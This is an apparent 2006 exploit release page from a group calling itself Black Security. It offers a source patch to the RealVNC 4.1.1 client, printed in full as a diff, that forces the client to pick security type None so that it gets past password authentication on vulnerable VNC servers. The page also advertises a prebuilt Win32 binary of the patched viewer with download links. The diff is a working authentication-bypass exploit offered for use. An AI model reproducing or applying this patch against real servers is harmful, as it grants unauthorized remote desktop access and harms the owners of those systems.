Black Security

security darker than gray...

"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Exploits

VNC 4.1.1 (VNC Null Authentication) Auth Bypass Patch

By redsand@blacksecurity.org
&&
zeroday@blacksecurity.org

http://blacksecurity.org

Greetings: #black, darkeagle, felinemenace and the whole gang at pulltheplug

This patch is for the real vnc source package:
vnc-4_1_1-unixsrc however other clients can be modified.

**Update
A win32 binary version is now available
BL4CK-vncviewer-authbypass.exe
MD5: 5ca3f79b193cf5aa43bfc0733d021a0c 

xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os->writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os->writeU8(secTypeNone);
       os->flush();
       vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }

Download Now!

VNC 4.1.1 (VNC Null Authentication) Auth Bypass Patch

VNC 4.1.1 (VNC Null Authentication) Auth Bypass Win32 Binary

© 2006 Black Security.org     Home